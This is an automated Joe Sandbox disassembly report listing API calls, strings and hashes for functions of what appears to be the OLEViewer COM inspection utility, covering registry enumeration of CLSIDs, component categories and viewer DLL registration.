Part of subcall function 00D3D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
Part of subcall function 00D3D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
Part of subcall function 00D3D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
Part of subcall function 00D3D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
Part of subcall function 00D3D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
Part of subcall function 00D3D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13

#800.MFC42U(?,00000000,OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 00D2B546
#6112.MFC42U(00000011), ref: 00D2B556
#2613.MFC42U(00000000,00000011), ref: 00D2B571
#384.MFC42U(00000000,00000011), ref: 00D2B590
#2089.MFC42U(000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B5B2
#1197.MFC42U(Could not load bitmaps,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B5C2
#520.MFC42U(00000002,00D23458,00D240EC,00D24A54,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B5EE
#986.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B5FE
#4604.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B60B
#1197.MFC42U(Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.,00000000,00000000,00000000,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00D2B640
#5977.MFC42U ref: 00D2B688

Strings

Could not load bitmaps, xrefs: 00D2B5BD
OleInitialize failed. Could not initialized OLE; OLEViewer cannot run., xrefs: 00D2B528
Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator., xrefs: 00D2B63B

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #1197#800$AddressH_prolog3MessageProc$#1202#2089#2613#2810#384#4604#520#538#540#5977#6112#858#922#986FormatFreeHandleLibraryLoadLocalModuleVersionexit
String ID: Could not load bitmaps$OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.$Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
API String ID: 800470354-1540245615
Opcode ID: 42ac3700c9550feb3dccdffdd9d00b03850081cd9c82d25cb1e9b2ef82b7fea8
Instruction ID: 5c4e6d2467ccd9b3faa20ccb110635239aacd30e24c6b2a0fc3efd20e79f327a
Opcode Fuzzy Hash: 42ac3700c9550feb3dccdffdd9d00b03850081cd9c82d25cb1e9b2ef82b7fea8
Instruction Fuzzy Hash: 8841C370B003259BDB14BBB4AC56A3E77A5EF65328F14442AF552EB3D2DFB48D009A30

Function 00D3642D Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 284
registrycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00D236E4,00000000,00000001,00D236F4,00000000), ref: 00D364C3
GetUserDefaultLCID.KERNEL32(00000000), ref: 00D364EA
StringFromGUID2.OLE32(?,?,00000050), ref: 00D36589
wsprintfW.USER32 ref: 00D365C8
RegOpenKeyW.ADVAPI32(80000000,Component Categories,00000000), ref: 00D36750
RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00D36789
RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00D367AB
RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 00D367E0
wsprintfW.USER32 ref: 00D36813
RegCloseKey.ADVAPI32(?), ref: 00D3690C

Strings

409, xrefs: 00D367D5
Component Categories, xrefs: 00D36746
_%S <no name>, xrefs: 00D365BC
g, xrefs: 00D36484
%s <no name>, xrefs: 00D36807

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Openwsprintf$CloseCreateDefaultEnumFromInstanceQueryStringUserValue
String ID: %s <no name>$409$Component Categories$_%S <no name>$g
API String ID: 3086071695-2486616072
Opcode ID: 4fb7387acf02a7f6a52ac2af16065032eb78a1b18255a767ac11b2b37f0b128d
Instruction ID: 09fd5e25ca88bcb39759c675a3e74ef8c12b86be53890937fcd50dbf600c2058
Opcode Fuzzy Hash: 4fb7387acf02a7f6a52ac2af16065032eb78a1b18255a767ac11b2b37f0b128d
Instruction Fuzzy Hash: C8E10D75A00228DFDB60DF64DC45BA9B7BAFB98315F1041E6E409E7250DB729EA4CF20

Function 00D2DBA0 Relevance: 114.2, APIs: 50, Strings: 15, Instructions: 422
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#6195.MFC42U(00D221A0), ref: 00D2DBDB
#1143.MFC42U(00000093,0000000E,00000093,00D221A0), ref: 00D2DBE9
LoadIconW.USER32(00000000,00000093), ref: 00D2DBEF
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D2DC03
#6195.MFC42U(00D221A0), ref: 00D2DC10

Part of subcall function 00D2E409: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E41E
Part of subcall function 00D2E409: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E436
Part of subcall function 00D2E409: SendMessageW.USER32(?,00001309,00000000,00000000), ref: 00D2E451
Part of subcall function 00D2E409: #6211.MFC42U(00000000), ref: 00D2E45E

#1662.MFC42U ref: 00D2DC2A
lstrcmpW.KERNEL32(?,Application IDs), ref: 00D2DC37
#6195.MFC42U(Application IDs), ref: 00D2DC4C
#6195.MFC42U(All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 00D2DC58
#1143.MFC42U(00000094,0000000E,00000094,All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 00D2DC66
LoadIconW.USER32(00000000,00000094), ref: 00D2DC6C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D2DC80
#2644.MFC42U ref: 00D2E158

Strings

InprocServer, xrefs: 00D2E0BE
InprocHandler, xrefs: 00D2E0EC
Application IDs, xrefs: 00D2DC2F, 00D2DC41
All HKEY_CLASSES_ROOT\APPID Entries, xrefs: 00D2DC51
Interfaces, xrefs: 00D2DE2B
DefaultIcon, xrefs: 00D2DFDD
Component Categories, xrefs: 00D2DD3F
CLSID\%s, xrefs: 00D2DF8D
LocalServer, xrefs: 00D2E090
Type Libraries, xrefs: 00D2DDF4
No CLSID available., xrefs: 00D2DCCF
LocalServer32, xrefs: 00D2E079
All HKEY_CLASSES_ROOT\Component Categories Entries, xrefs: 00D2DD53
InprocServer32, xrefs: 00D2E0A7
InprocHandler32, xrefs: 00D2E0D5

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#6195$#1143IconLoad$#1662#2644#6211lstrcmp
String ID: All HKEY_CLASSES_ROOT\APPID Entries$All HKEY_CLASSES_ROOT\Component Categories Entries$Application IDs$CLSID\%s$Component Categories$DefaultIcon$InprocHandler$InprocHandler32$InprocServer$InprocServer32$Interfaces$LocalServer$LocalServer32$No CLSID available.$Type Libraries
API String ID: 3415864282-4228781962
Opcode ID: 21a7e715f8c36d4aca4dd0433eb402c26259999e82c5482299f82ab5efd142e7
Instruction ID: 5401df776779b3604d21eeef056ef0491669c5c00957c1a180869ba6cebe9b02
Opcode Fuzzy Hash: 21a7e715f8c36d4aca4dd0433eb402c26259999e82c5482299f82ab5efd142e7
Instruction Fuzzy Hash: E3E1C771540324ABDB21BF30EC86FAA776AEF56708F040474F949AB192DBB49D85CB70

Function 00D2F616 Relevance: 110.7, APIs: 42, Strings: 21, Instructions: 447
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2F620
#540.MFC42U(0000025C,00D2DF5F), ref: 00D2F637
StringFromGUID2.OLE32(?,?,00000028,0000025C,00D2DF5F), ref: 00D2F64D
SendMessageW.USER32(?,0000014D,000000FF,None), ref: 00D2F669
#861.MFC42U(?), ref: 00D2F6B5
#6195.MFC42U(?,?,?,?,?), ref: 00D2F705
#3087.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 00D2F73F
#2634.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 00D2F746
#861.MFC42U(?,?,0000008B,00000001,?,?,?,?,?), ref: 00D2F790
#861.MFC42U(?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 00D2F7DE
#2634.MFC42U(00000000,?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 00D2F7EB
#861.MFC42U(?,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F837
#861.MFC42U(00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F851
#2634.MFC42U(00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F85E
lstrcmpiW.KERNEL32(?,BOTH,?,?,00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F8AA
lstrcmpiW.KERNEL32(?,FREE,?,?,00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F8C7
lstrcmpiW.KERNEL32(?,APARTMENT,?,?,00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F8E4
lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F901
SendMessageW.USER32(?,0000014D,000000FF,None), ref: 00D2F939
#861.MFC42U(?,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F9DD
#2756.MFC42U(msjava.dll,?,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F9E9
#2756.MFC42U(MSJAVA.DLL,msjava.dll,?,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F9FA
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2FA13
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2FA2A
#861.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D2FA7D
#2634.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D2FA97
lstrcmpiW.KERNEL32(?,BOTH,?,?,?,00000000), ref: 00D2FAE3
lstrcmpiW.KERNEL32(?,FREE,?,?,?,00000000), ref: 00D2FB00
lstrcmpiW.KERNEL32(?,APARTMENT,?,?,?,00000000), ref: 00D2FB1D
lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,?,00000000), ref: 00D2FB3A
SendMessageW.USER32(?,0000014D,000000FF,None), ref: 00D2FB72
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2FBBF
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2FBD8
#861.MFC42U(00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FBEC
#3087.MFC42U(00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FBF8
#2634.MFC42U(00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC00
#3087.MFC42U(0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC0C
#2634.MFC42U(00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC14
#2634.MFC42U(00000001,00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC21
#2634.MFC42U(00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC2E
#6330.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC45
#800.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC50

Strings

None, xrefs: 00D2F657, 00D2F920, 00D2F927, 00D2FB59, 00D2FB60
NEUTRAL, xrefs: 00D2F8F5, 00D2FB2E
InProcHandler32, xrefs: 00D2F810, 00D2F880
Apartment, xrefs: 00D2F8EE, 00D2FB27
InProcServer32, xrefs: 00D2F9AF, 00D2FA59, 00D2FAB9
FREE, xrefs: 00D2F8BB, 00D2FAF4
ThreadingModel, xrefs: 00D2F87B, 00D2FAB4
DllSurrogate, xrefs: 00D2FB90
Neutral, xrefs: 00D2F911, 00D2FB4A
Free, xrefs: 00D2F8D1, 00D2FB0A
MSJAVA.DLL, xrefs: 00D2F9F3
LocalServer32, xrefs: 00D2F95D
AppID, xrefs: 00D2F687
Both, xrefs: 00D2F8B4, 00D2FAED
JavaClass, xrefs: 00D2FA54
TreatAs, xrefs: 00D2F6D7
msjava.dll, xrefs: 00D2F9E2
BOTH, xrefs: 00D2F89E, 00D2FAD7
APARTMENT, xrefs: 00D2F8D8, 00D2FB11
LocalService, xrefs: 00D2F764, 00D2F7B2
ServiceParameters, xrefs: 00D2F7AD

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2634#861lstrcmpi$MessageSend$#3087$#2756$#540#6195#6330#800FromH_prolog3_String
String ID: APARTMENT$Apartment$AppID$BOTH$Both$DllSurrogate$FREE$Free$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$MSJAVA.DLL$NEUTRAL$Neutral$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
API String ID: 3203418238-4284008715
Opcode ID: 488967a25f40af3d0b6e2624694e32ba45e23821afe35f93a12b3b6c0a01225b
Instruction ID: 6327aaff08a026e62adc09991985e0d1968818e1d7afe939c79d093d96215fae
Opcode Fuzzy Hash: 488967a25f40af3d0b6e2624694e32ba45e23821afe35f93a12b3b6c0a01225b
Instruction Fuzzy Hash: 1DF19731640329ABDF11EF20DD86FEA7379EF25704F0409B5B915AB1D1DBB19A888A70

Function 00D2BB96 Relevance: 100.0, APIs: 46, Strings: 11, Instructions: 246
registrylibrarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2BBA0
#540.MFC42U(00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BBB4
#4155.MFC42U(00000004,00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BBC6
StringFromGUID2.OLE32(00D21980,?), ref: 00D2BBEB
wsprintfW.USER32 ref: 00D2BC04
RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 00D2BC27
#3516.MFC42U(?,Version,00000000), ref: 00D2BC42
#540.MFC42U(00000004,00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BC56
#540.MFC42U(00000004,00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BC64
GetModuleFileNameW.KERNEL32(00000000,?,00000208,00000004,00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BC7A
wcsrchr.MSVCRT ref: 00D2BC92
lstrcpyW.KERNEL32(-00000002,IVIEWERS.DLL), ref: 00D2BCA3
#538.MFC42U(?), ref: 00D2BCB6
#4155.MFC42U(00000012), ref: 00D2BCD2
#4155.MFC42U(00000013,00000012), ref: 00D2BCDF
#940.MFC42U(?,00000013,00000012), ref: 00D2BCF1
#4155.MFC42U(00000015,?,00000013,00000012), ref: 00D2BCFE
#940.MFC42U(?,00000015,?,00000013,00000012), ref: 00D2BD10
#1197.MFC42U(?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD1F
#355.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD4B
#2507.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD5A
#3494.MFC42U(?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD74
#858.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD84
#800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD8F
#800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD9E
#641.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BDA9
LoadLibraryW.KERNELBASE(?,?), ref: 00D2BDB4
GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00D2BDCB
#800.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BDF3
#641.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BDFE
#4155.MFC42U(00000014), ref: 00D2BE11
#4155.MFC42U(00000013,00000014), ref: 00D2BE1E
#940.MFC42U(?,00000013,00000014), ref: 00D2BE30
#1197.MFC42U(?,00000000,00000000,?,00000013,00000014), ref: 00D2BE3F
FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000013,00000014), ref: 00D2BE4B
RegOpenKeyExW.ADVAPI32(80000000,Interface,00000000,000F003F,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BE69
StringFromGUID2.OLE32(00D29E6C,?,00000031), ref: 00D2BE84
StringFromGUID2.OLE32(00D29E7C,?,00000031,?,?,00000000,IClientSecurity), ref: 00D2BEAA
StringFromGUID2.OLE32(00D29E8C,?,00000031,?,?,00000000,IServerSecurity), ref: 00D2BED0
StringFromGUID2.OLE32(00D29E5C,?,00000031,?,?,00000000,IMallocSpy), ref: 00D2BEF6
RegCloseKey.ADVAPI32(?,?,?,00000000,IMultiQI), ref: 00D2BF18
#6398.MFC42U(?,Version,0000003D), ref: 00D2BF34
#800.MFC42U(?,Version,0000003D), ref: 00D2BF3F
#800.MFC42U(?,Version,0000003D), ref: 00D2BF4A
#800.MFC42U(?,Version,0000003D), ref: 00D2BF55
#800.MFC42U(?,Version,0000003D), ref: 00D2BF62

Strings

iviewers.dll, xrefs: 00D2BD45
IClientSecurity, xrefs: 00D2BE8A
IVIEWERS.DLL, xrefs: 00D2BC9A
DllRegisterServer, xrefs: 00D2BDC5
IMallocSpy, xrefs: 00D2BED6
IServerSecurity, xrefs: 00D2BEB0
Version, xrefs: 00D2BC32, 00D2BF24
IMultiQI, xrefs: 00D2BEFC
Interface, xrefs: 00D2BE5F
DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|, xrefs: 00D2BD39
Component Categories\%s, xrefs: 00D2BBFE

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#4155$FromString$#540#940$#1197#641Library$#2507#3494#3516#355#538#6398#858AddressCloseFileFreeH_prolog3_LoadModuleNameOpenProcQueryValuelstrcpywcsrchrwsprintf
String ID: Component Categories\%s$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$IClientSecurity$IMallocSpy$IMultiQI$IServerSecurity$IVIEWERS.DLL$Interface$Version$iviewers.dll
API String ID: 2887186624-2619698232
Opcode ID: d74cb4fe7c3983cfcdddb9397d9cb6128222841d5a11d638b7504dced1c7bdd8
Instruction ID: 2e5857ee232d26867012aab1bfa9a865ddb38c77ffeccbd16b212eb3e875ecc7
Opcode Fuzzy Hash: d74cb4fe7c3983cfcdddb9397d9cb6128222841d5a11d638b7504dced1c7bdd8
Instruction Fuzzy Hash: 27A16136A40328AADB20EB60EC56FDD7779EB26714F1040A5B605B61D1DB705F89CF32

Function 00D37A11 Relevance: 94.8, APIs: 33, Strings: 21, Instructions: 294
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLSIDFromString.OLE32(00000000,?), ref: 00D37A54

Strings

InprocServer, xrefs: 00D37BC6
%s\NotInsertable, xrefs: 00D37D91
ToolboxBitmap32, xrefs: 00D37E8F
prx32.dll, xrefs: 00D37B4E
2pr32.dll, xrefs: 00D37B64
2prox.dll, xrefs: 00D37BF6
ToolboxBitmap, xrefs: 00D37EB2
%s\Insertable, xrefs: 00D37E02
(, xrefs: 00D37D53
2.dll, xrefs: 00D37C0C
cnv32.dll, xrefs: 00D37B7A
2disp.dll, xrefs: 00D37C22
aut32.dll, xrefs: 00D37B90
CLSID\%s, xrefs: 00D37A80
32.dll, xrefs: 00D37B38
Ole1Class, xrefs: 00D37C49
Control, xrefs: 00D37CA0
InprocServer32, xrefs: 00D37B04
Insertable, xrefs: 00D37CF7
ProgID, xrefs: 00D37D6E
ole, xrefs: 00D37B1F, 00D37BDD

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: FromString
String ID: %s\Insertable$%s\NotInsertable$($2.dll$2disp.dll$2pr32.dll$2prox.dll$32.dll$CLSID\%s$Control$InprocServer$InprocServer32$Insertable$Ole1Class$ProgID$ToolboxBitmap$ToolboxBitmap32$aut32.dll$cnv32.dll$ole$prx32.dll
API String ID: 1694596556-344945948
Opcode ID: 83af47e19cd8576314c5b39c25ce9b7912221ec310639330fa64098c36babb12
Instruction ID: 21ab82a43c9a887accc4289a415c30f8a21e2cd9c485babea7248c867d137e2f
Opcode Fuzzy Hash: 83af47e19cd8576314c5b39c25ce9b7912221ec310639330fa64098c36babb12
Instruction Fuzzy Hash: 86D1E3B5A44729EFDB309F60EC8DB9977B8BB24305F0405E5E519E22A1D7709E988F30

Function 00D3020E Relevance: 81.2, APIs: 54, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#3087.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3024A
#6211.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30251
#3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3025E
#6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30265
#3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D30272
#6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D30279
#3087.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D30289
#6211.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D30290
#3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001), ref: 00D3029D
#6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001), ref: 00D302A4
#3087.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41), ref: 00D302B1
#6211.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41), ref: 00D302B8
#3087.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 00D302C5
#6211.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 00D302CC
#3087.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 00D302D9
#6211.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 00D302E0
#3087.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D302F1
#6211.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D302F8
#3087.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30308
#6211.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3030F
#3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D3031C
#6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D30323
#3087.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D30330
#6211.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D30337
#3087.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30348
#6211.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3034F
#3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3035C
